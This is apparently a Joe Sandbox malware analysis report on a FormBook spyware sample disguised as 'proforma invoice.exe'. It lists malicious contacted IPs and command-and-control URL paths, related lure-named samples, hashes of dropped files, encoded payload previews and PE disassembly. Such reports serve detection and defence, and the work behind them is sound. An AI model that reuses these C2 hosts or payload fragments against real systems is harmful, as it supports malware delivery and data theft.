                http://www.bfiworkerscomp.com/__media__/js/trademark.php?d=bfiworkerscomp.com&type=nsclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/mysql.pngclip.exe, 00000003.00000002.4104507554.00000000068F8000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003F78000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                23.251.54.212
                		www.anuts.topUnited States
                		62468VPSQUANUStrue
                172.67.210.102
                		www.dmtxwuatbz.ccUnited States
                		13335CLOUDFLARENETUStrue
                213.145.228.16
                		www.sandranoll.comAustria
                		25575DOMAINTECHNIKATtrue
                194.9.94.85
                		www.xn--matfrmn-jxa4m.seSweden
                		39570LOOPIASEtrue
                5.44.111.162
                		www.hprlz.czGermany
                		45031PROVIDERBOXIPv4IPv6DUS1DEtrue
                217.160.0.106
                		www.catherineviskadi.comGermany
                		8560ONEANDONE-ASBrauerstrasse48DEtrue
                208.91.197.27
                		www.bfiworkerscomp.comVirgin Islands (BRITISH)
                		40034CONFLUENCE-NETWORK-INCVGtrue
                91.195.240.19
                		parkingpage.namecheap.comGermany
                		47846SEDO-ASDEtrue
                199.192.19.19
                		www.telwisey.infoUnited States
                		22612NAMECHEAP-NETUStrue
                43.252.167.188
                		www.xn--fhq1c541j0zr.comHong Kong
                		38277CLINK-AS-APCommuniLinkInternetLimitedHKtrue

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1497807
                Start date and time:2024-08-23 04:17:05 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 9m 55s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:8
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:2
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:proforma invoice.exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@7/5@14/10
                EGA Information:
                • Successful, ratio: 75%
                HCA Information:
                • Successful, ratio: 90%
                • Number of executed functions: 47
                • Number of non-executed functions: 298
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report creation exceeded maximum time and may have missing disassembly code information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                22:18:50API Interceptor12138527x Sleep call for process: clip.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                23.251.54.212Arrival Notice.exeGet hashmaliciousFormBookBrowse
                • www.anuts.top/li0t/
                shipping documents.exeGet hashmaliciousFormBookBrowse
                • www.anuts.top/li0t/
                MV Sunshine, ORDER.exeGet hashmaliciousFormBookBrowse
                • www.anuts.top/li0t/
                PAYROLL SUMMARY _pdf.exeGet hashmaliciousFormBookBrowse
                • www.anuts.top/li0t/
                LisectAVT_2403002B_466.exeGet hashmaliciousFormBookBrowse
                • www.anuts.top/d5fo/
                TOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                • www.anuts.top/li0t/
                Attendance list.exeGet hashmaliciousFormBookBrowse
                • www.anuts.top/li0t/
                Payment_Advice.pdf.exeGet hashmaliciousFormBookBrowse
                • www.anuts.top/niik/
                BL7247596940.pdf.exeGet hashmaliciousFormBookBrowse
                • www.anuts.top/niik/?wp=Y4bXb&PRT4=H/YiygX9KITTv7luV6yUPKrN50P+s1tzENv79uR8DwTDmQwOwNUPDlYEBevB1BzVmv2ACSfGFUmX0UJ7u9Bld+nnTqDy3OkaCqYdjJlbok8OnyXr0/DiKgU=
                Arrival Notice.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                • www.anuts.top/niik/
                172.67.210.102shipping documents.exeGet hashmaliciousFormBookBrowse
                • www.dmtxwuatbz.cc/lfkn/
                PAYROLL SUMMARY _pdf.exeGet hashmaliciousFormBookBrowse
                • www.dmtxwuatbz.cc/lfkn/
                TOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                • www.dmtxwuatbz.cc/lfkn/
                Attendance list.exeGet hashmaliciousFormBookBrowse
                • www.dmtxwuatbz.cc/lfkn/
                213.145.228.16Arrival Notice.exeGet hashmaliciousFormBookBrowse
                • www.sandranoll.com/aroo/
                shipping documents.exeGet hashmaliciousFormBookBrowse
                • www.sandranoll.com/aroo/
                MV Sunshine, ORDER.exeGet hashmaliciousFormBookBrowse
                • www.sandranoll.com/aroo/
                PAYROLL SUMMARY _pdf.exeGet hashmaliciousFormBookBrowse
                • www.sandranoll.com/aroo/
                LisectAVT_2403002A_87.exeGet hashmaliciousFormBookBrowse
                • www.sandranoll.com/4bud/
                bJrO2iUerN.elfGet hashmaliciousUnknownBrowse
                • strg.or.at/wordpress/wp-login.php
                TOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                • www.sandranoll.com/aroo/
                Attendance list.exeGet hashmaliciousFormBookBrowse
                • www.sandranoll.com/aroo/
                Navana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                • www.sandranoll.com/zg5v/
                Swift Message.pdf.exeGet hashmaliciousFormBookBrowse
                • www.sandranoll.com/cga5/

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                www.dmtxwuatbz.ccArrival Notice.exeGet hashmaliciousFormBookBrowse
                • 104.21.45.56
                shipping documents.exeGet hashmaliciousFormBookBrowse
                • 172.67.210.102
                MV Sunshine, ORDER.exeGet hashmaliciousFormBookBrowse
                • 104.21.45.56
                PAYROLL SUMMARY _pdf.exeGet hashmaliciousFormBookBrowse
                • 172.67.210.102
                TOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                • 172.67.210.102
                Attendance list.exeGet hashmaliciousFormBookBrowse
                • 172.67.210.102
                Swift Copy #U00a362,271.03.Pdf.exeGet hashmaliciousFormBookBrowse
                • 172.67.210.102
                PO-104678522.exeGet hashmaliciousFormBookBrowse
                • 172.67.210.102
                NEW ORDER-RFQ#10112023Q4.exeGet hashmaliciousFormBookBrowse
                • 104.21.45.56
                NEW ORDER 75647839384.exeGet hashmaliciousFormBookBrowse
                • 104.21.45.56
                www.sandranoll.comArrival Notice.exeGet hashmaliciousFormBookBrowse
                • 213.145.228.16
                shipping documents.exeGet hashmaliciousFormBookBrowse
                • 213.145.228.16
                MV Sunshine, ORDER.exeGet hashmaliciousFormBookBrowse
                • 213.145.228.16
                PAYROLL SUMMARY _pdf.exeGet hashmaliciousFormBookBrowse
                • 213.145.228.16
                LisectAVT_2403002A_87.exeGet hashmaliciousFormBookBrowse
                • 213.145.228.16
                TOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                • 213.145.228.16
                Attendance list.exeGet hashmaliciousFormBookBrowse
                • 213.145.228.16
                Navana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                • 213.145.228.16
                Swift Message.pdf.exeGet hashmaliciousFormBookBrowse
                • 213.145.228.16
                1LZvA2cEfV.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                • 213.145.228.16
                www.xn--matfrmn-jxa4m.seArrival Notice.exeGet hashmaliciousFormBookBrowse
                • 194.9.94.85
                shipping documents.exeGet hashmaliciousFormBookBrowse
                • 194.9.94.85
                MV Sunshine, ORDER.exeGet hashmaliciousFormBookBrowse
                • 194.9.94.85
                PAYROLL SUMMARY _pdf.exeGet hashmaliciousFormBookBrowse
                • 194.9.94.85
                docs_pdf.exeGet hashmaliciousFormBookBrowse
                • 194.9.94.85
                TOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                • 194.9.94.85
                Attendance list.exeGet hashmaliciousFormBookBrowse
                • 194.9.94.85
                Navana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                • 194.9.94.85
                D7KV2Z73zC.rtfGet hashmaliciousFormBookBrowse
                • 194.9.94.85
                Scan Doc.docx.docGet hashmaliciousFormBookBrowse
                • 194.9.94.85
                www.catherineviskadi.comArrival Notice.exeGet hashmaliciousFormBookBrowse
                • 217.160.0.106
                shipping documents.exeGet hashmaliciousFormBookBrowse
                • 217.160.0.106
                MV Sunshine, ORDER.exeGet hashmaliciousFormBookBrowse
                • 217.160.0.106
                PAYROLL SUMMARY _pdf.exeGet hashmaliciousFormBookBrowse
                • 217.160.0.106
                docs_pdf.exeGet hashmaliciousFormBookBrowse
                • 217.160.0.106
                TOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                • 217.160.0.106
                Attendance list.exeGet hashmaliciousFormBookBrowse
                • 217.160.0.106

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                DOMAINTECHNIKATArrival Notice.exeGet hashmaliciousFormBookBrowse
                • 213.145.228.16
                shipping documents.exeGet hashmaliciousFormBookBrowse
                • 213.145.228.16
                MV Sunshine, ORDER.exeGet hashmaliciousFormBookBrowse
                • 213.145.228.16
                PAYROLL SUMMARY _pdf.exeGet hashmaliciousFormBookBrowse
                • 213.145.228.16
                LisectAVT_2403002A_87.exeGet hashmaliciousFormBookBrowse
                • 213.145.228.16
                bJrO2iUerN.elfGet hashmaliciousUnknownBrowse
                • 213.145.228.16
                TOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                • 213.145.228.16
                Attendance list.exeGet hashmaliciousFormBookBrowse
                • 213.145.228.16
                Navana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                • 213.145.228.16
                Swift Message.pdf.exeGet hashmaliciousFormBookBrowse
                • 213.145.228.16
                CLOUDFLARENETUShttps://www.netskopesecuritycheck.com/Get hashmaliciousUnknownBrowse
                • 1.1.1.1
                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                • 188.114.97.3
                8468281651.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                • 188.114.96.3
                file.exeGet hashmaliciousLummaC, VidarBrowse
                • 188.114.97.3
                https://k-trade-hub.vercel.app/?web=kdjung3@hdel.co.krGet hashmaliciousUnknownBrowse
                • 104.17.25.14
                cum.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                • 162.159.135.232
                BAH.xlsGet hashmaliciousUnknownBrowse
                • 162.159.137.9
                http://meta-help.pages.dev/twenty.htmlGet hashmaliciousUnknownBrowse
                • 172.64.153.29
                http://groupsextelegram.pages.dev/favicon.ico/link-1Get hashmaliciousUnknownBrowse
                • 188.114.97.3
                http://telegramgirlshorny.pages.dev/Get hashmaliciousUnknownBrowse
                • 104.17.25.14
                VPSQUANUSArrival Notice.exeGet hashmaliciousFormBookBrowse
                • 23.251.54.212
                shipping documents.exeGet hashmaliciousFormBookBrowse
                • 23.251.54.212
                MV Sunshine, ORDER.exeGet hashmaliciousFormBookBrowse
                • 23.251.54.212
                PAYROLL SUMMARY _pdf.exeGet hashmaliciousFormBookBrowse
                • 23.251.54.212
                v9.exeGet hashmaliciousUnknownBrowse
                • 154.222.224.99
                1.exeGet hashmaliciousUnknownBrowse
                • 154.222.224.99
                v9.exeGet hashmaliciousUnknownBrowse
                • 154.222.224.99
                bot.x86.elfGet hashmaliciousMirai, OkiruBrowse
                • 69.165.74.76
                bot.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                • 69.165.74.76
                bot.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                • 69.165.74.76
                LOOPIASEArrival Notice.exeGet hashmaliciousFormBookBrowse
                • 194.9.94.85
                shipping documents.exeGet hashmaliciousFormBookBrowse
                • 194.9.94.85
                MV Sunshine, ORDER.exeGet hashmaliciousFormBookBrowse
                • 194.9.94.85
                PAYROLL SUMMARY _pdf.exeGet hashmaliciousFormBookBrowse
                • 194.9.94.85
                http://tok2np0cklt.top/Get hashmaliciousUnknownBrowse
                • 194.9.94.85
                docs_pdf.exeGet hashmaliciousFormBookBrowse
                • 194.9.94.85
                TOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                • 194.9.94.85
                Attendance list.exeGet hashmaliciousFormBookBrowse
                • 194.9.94.85
                Navana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                • 194.9.94.85
                Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                • 194.9.94.86

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Temp\23802I71

                Download File
                Process:C:\Windows\SysWOW64\clip.exe
                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                Category:dropped
                Size (bytes):114688
                Entropy (8bit):0.9746603542602881
                Encrypted:false
                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                MD5:780853CDDEAEE8DE70F28A4B255A600B
                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                Malicious:false
                Reputation:high, very likely benign file
                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\autCF31.tmp

                Download File
                Process:C:\Users\user\Desktop\proforma invoice.exe
                File Type:data
                Category:dropped
                Size (bytes):270848
                Entropy (8bit):7.993733048425197
                Encrypted:true
                SSDEEP:6144:gGMCHOeyOhvtdmzotQi7omjjU9AzuEja7pIFw:gGMYyOhvuo+IomEd4Bw
                MD5:81D057B1AC360DD8069E3F2BD4733088
                SHA1:0FA44CB9A89C387909409C7F4C4E1FE16522B572
                SHA-256:83BF3620FBE8C97F5DF54A87FAD458C0CAC9CF30162E7E4E474398FB980CA667
                SHA-512:17F04D2C81713FF251469FB383988B34C5BF2538D686A7FF2809BF950A608752FC4205D60DAAD552935EEE87CEB40A7E71B92FA93EBA351515A136EACEFE6414
                Malicious:false
                Reputation:low
                Preview:{h.a.RBFJ..Y..n.WT...S\...3WRBFJZENPNWJVR9WWVPG4PT62W3WR.FJZKQ.@W._...V..f`8=E.'A850''z&/> 8>v0\w%#>g]>tr}..:=&#dWHDtNWJVR9W.WY..03..7T.o"!.@..t7-.H...j0 .J..kS0../)2x.7.WJVR9WWV..4P.73W".j"FJZENPNW.VP8\V]PG$TT62W3WRBFjOENP^WJVr=WWV.G4@T62U3WTBFJZENPHWJVR9WWVpC4PV62W3WR@F..EN@NWZVR9WGVPW4PT62W#WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT.F2K#RBF.UANP^WJVB=WWFPG4PT62W3WRBFJzEN0NWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT6

                C:\Users\user\AppData\Local\Temp\autCF61.tmp

                Download File
                Process:C:\Users\user\Desktop\proforma invoice.exe
                File Type:data
                Category:dropped
                Size (bytes):43672
                Entropy (8bit):7.820005416737383
                Encrypted:false
                SSDEEP:768:jt05sBKLqjyJCMRHYLi4dba6+BdMmIgQ75+0vcyGvb9rLvomDVJ6Qw+:jq+2qjYHYLXR+fXIgspCvb9r0oUQP
                MD5:74A84DBDD1A8E46DFD07A5A5C3A459CC
                SHA1:8E60485A1C708D51B65C34C31EC56E17006C5A90
                SHA-256:B3CC10FF64AB44570D83324AD954D80BFD07F23D18269863F71DF81C9284BF42
                SHA-512:54474611AAC5212D0A0CFAC40C2F0BD5255C3555C194D424D7DE042F8CB33B5F5F9B9739663C6C19FDF1820FCA5DA85DC5888D88F4645406AD556A28DDC227A0
                Malicious:false
                Reputation:low
                Preview:EA06..P...(.y..g5.L...6.R&.ZT.gA..(s9.bm5.M.u...6..s.|.eF..)39.....*.9.*g6.....6.T.s...mP.L.`.52g0......3.R&sj|.mD..(.9..g4...9..3.P..*..sA...9..g0........0....j..qN..k.9."m4...3jX..6..szl.eP..+ ...3.U@.j..mX..@....R.Zg.....d....p..m5.L.. .j....:...X.1..'4i......3.|....@.I...3.6`.`....J..mY..g5...6......6.T&..0.P...0UP.h...{.5J..mE..*S9...N..js9.&m5..@.%.g3..(.'.\......y...........3.T.Q..(.h.L..9.:g3.L.8I.@....+@...........FiO.M..J..eN.....@.15..)@.0..K.D.39.$..L.4Y...D.i39..aD..q@.b..a.6.......Q4p......@c.%R.3....I%L...l(....`...#.`.mTf.@...t...U..`......H..C.D....Fg5...3......L.`..r...T&s...S4.h.....f........6.9...8...&UT.z.....$....y.?...m6..$.."mM.M..i.jm1....Y@..(.(.`.....@..P.!..&`N...|.@.u`...T..fh....S@h@.....P..P.....S...,.....h..%..".M..9.......d%<...B....8."..)`c...7.`.BiD.Li`.Uh.. ....S.L@*. .`...'......ld.3..&s.<....Rf.: .eZ... .uZm2.C(.t...U.E.5qD.H.`... .w...@G.mW....J.....&...A..)@,......*.....$.qK....L(..T...i.....Pf.....6....j8.]

                C:\Users\user\AppData\Local\Temp\biopsies

                Download File
                Process:C:\Users\user\Desktop\proforma invoice.exe
                File Type:ASCII text, with very long lines (65536), with no line terminators
                Category:dropped
                Size (bytes):86022
                Entropy (8bit):4.180140028656108
                Encrypted:false
                SSDEEP:1536:/19Qqf0F14BYFVjis+NeU1FvNf4VGvCcgiZa/4NUX6w6ybsH5M:pSg1eXOpZq0y
                MD5:06229991C7E311642A6A258178377295
                SHA1:CEBFFB5E77945ABA26A6ED2147248B9ABAA42B93
                SHA-256:126B55211A09E94EDE4EFF05846791A5F31A2A1BCBBADD4961B7E27CA4E8AC2D
                SHA-512:FABDC481D96608C9CC5144CEDAF77D0614FD22E98DD1448FA8EE76D8C69C6B239B25C2B51390ADAEDDFA9474AB2D7B1E074C617B6A7567A512475434A7B3FA96
                Malicious:false
                Reputation:low
                Preview:30F78B35Z35H38F62H65J63A38C31X65X63P63E63Z30O32F30I30G30F30V35J36M35I37T62R38Q36P62K30G30L30A30M30Q30H36O36D38G39D34W35C38U34C62A39A36T35D30N30G30O30F30N30N36D36W38N39X34H64F38N36K62K61Z37M32P30Y30H30R30U30L30C36X36J38G39T35R35D38X38P62U38W36J65T30B30H30V30H30G30A36V36M38C39F34R35I38F61O62F39U36K35A30F30H30R30M30D30X36T36Y38U39Y34F64I38M63Q62P61F36X63Q30G30U30R30D30T30D36R36E38R39B35N35S38I65Y62S38B33B33G30Q30W30M30T30W30G36A36O38Z39K34P35C39J30U62O39N33J32U30P30R30I30Z30V30G36F36C38M39N34O64M39Y32N62N61F32N65F30J30M30B30K30L30I36I36C38B39E35Y35S39I34U62D38Q36D34R30C30K30I30X30Q30S36M36O38G39X34A35N39C36F62K39O36P63S30Q30M30E30T30O30T36J36F38N39X34Q64K39E38M62P61Z36A63Q30L30C30A30I30K30C36R36G38N39Q35O35A39V61F33J33M63H30J36D36P38V39T34N35K39W63O62U39K36Z65O30L30G30P30R30O30G36U36E38F39A38D64W34F34U66E66I66A66F66M66H62Z61Y37U34H30R30E30B30X30K30V36I36E38T39A39L35T34L36K66B66E66X66H66R66P62F38U36M34O30Q30K30C30S30H30C36C36W38L39B38W35H34X38R66G66E66T66S66O66P62Z39N36O63E30C30T30P30N30H3

                C:\Users\user\AppData\Local\Temp\undiscernibly

                Download File
                Process:C:\Users\user\Desktop\proforma invoice.exe
                File Type:data
                Category:dropped
                Size (bytes):270848
                Entropy (8bit):7.993733048425197
                Encrypted:true
                SSDEEP:6144:gGMCHOeyOhvtdmzotQi7omjjU9AzuEja7pIFw:gGMYyOhvuo+IomEd4Bw
                MD5:81D057B1AC360DD8069E3F2BD4733088
                SHA1:0FA44CB9A89C387909409C7F4C4E1FE16522B572
                SHA-256:83BF3620FBE8C97F5DF54A87FAD458C0CAC9CF30162E7E4E474398FB980CA667
                SHA-512:17F04D2C81713FF251469FB383988B34C5BF2538D686A7FF2809BF950A608752FC4205D60DAAD552935EEE87CEB40A7E71B92FA93EBA351515A136EACEFE6414
                Malicious:false
                Reputation:low
                Preview:{h.a.RBFJ..Y..n.WT...S\...3WRBFJZENPNWJVR9WWVPG4PT62W3WR.FJZKQ.@W._...V..f`8=E.'A850''z&/> 8>v0\w%#>g]>tr}..:=&#dWHDtNWJVR9W.WY..03..7T.o"!.@..t7-.H...j0 .J..kS0../)2x.7.WJVR9WWV..4P.73W".j"FJZENPNW.VP8\V]PG$TT62W3WRBFjOENP^WJVr=WWV.G4@T62U3WTBFJZENPHWJVR9WWVpC4PV62W3WR@F..EN@NWZVR9WGVPW4PT62W#WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT.F2K#RBF.UANP^WJVB=WWFPG4PT62W3WRBFJzEN0NWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT62W3WRBFJZENPNWJVR9WWVPG4PT6

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.133041790424472
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:proforma invoice.exe
                File size:1'248'256 bytes
                MD5:77f8da00f3632972d585ff7efb0bea8c
                SHA1:987ce549f5b8bb619bd78e5f88ae3cd132bb8f34
                SHA256:aab17e4d4fcb75ffc655247c8f71df23d653b9b573d87eb2e32c589c543918f9
                SHA512:5b18f05dcb866aad05c25f792f3646c75444a3daf7abb52b2b5331c2a6764c9affea90735d0061d615f0a2c55226262d08b59c98c3c7cbe44528c621fd1fac16
                SSDEEP:24576:fqDEvCTbMWu7rQYlBQcBiT6rprG8aEnfOYbNoY5cap:fTvC/MTQYxsWR7aEfOYbNs
                TLSH:2945BF0273C1C022FFAB91734B9AF6115BBC69660123E62F13A81D79BE705B1563E763
                File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                File Icon

                Icon Hash:aaf3e3e3938382a0

                Static PE Info

                General

                Entrypoint:0x420577
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp:0x66C7BF2E [Thu Aug 22 22:43:58 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:948cc502fe9226992dce9417f952fce3

                Entrypoint Preview

                Instruction
                call 00007FDE00B0EA13h
                jmp 00007FDE00B0E31Fh
                push ebp
                mov ebp, esp
                push esi
                push dword ptr [ebp+08h]
                mov esi, ecx
                call 00007FDE00B0E4FDh
                mov dword ptr [esi], 0049FDF0h
                mov eax, esi
                pop esi
                pop ebp
                retn 0004h
                and dword ptr [ecx+04h], 00000000h
                mov eax, ecx
                and dword ptr [ecx+08h], 00000000h
                mov dword ptr [ecx+04h], 0049FDF8h
                mov dword ptr [ecx], 0049FDF0h
                ret
                push ebp
                mov ebp, esp
                push esi
                push dword ptr [ebp+08h]
                mov esi, ecx
                call 00007FDE00B0E4CAh
                mov dword ptr [esi], 0049FE0Ch
                mov eax, esi
                pop esi
                pop ebp
                retn 0004h
                and dword ptr [ecx+04h], 00000000h
                mov eax, ecx
                and dword ptr [ecx+08h], 00000000h
                mov dword ptr [ecx+04h], 0049FE14h
                mov dword ptr [ecx], 0049FE0Ch
                ret
                push ebp
                mov ebp, esp
                push esi
                mov esi, ecx
                lea eax, dword ptr [esi+04h]
                mov dword ptr [esi], 0049FDD0h
                and dword ptr [eax], 00000000h
                and dword ptr [eax+04h], 00000000h
                push eax
                mov eax, dword ptr [ebp+08h]
                add eax, 04h
                push eax
                call 00007FDE00B110BDh
                pop ecx
                pop ecx
                mov eax, esi
                pop esi
                pop ebp
                retn 0004h
                lea eax, dword ptr [ecx+04h]
                mov dword ptr [ecx], 0049FDD0h
                push eax
                call 00007FDE00B11108h
                pop ecx
                ret
                push ebp
                mov ebp, esp
                push esi
                mov esi, ecx
                lea eax, dword ptr [esi+04h]
                mov dword ptr [esi], 0049FDD0h
                push eax
                call 00007FDE00B110F1h
                test byte ptr [ebp+08h], 00000001h
                pop ecx

                Rich Headers

                Programming Language:
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x5a084.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x12f0000x7594.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
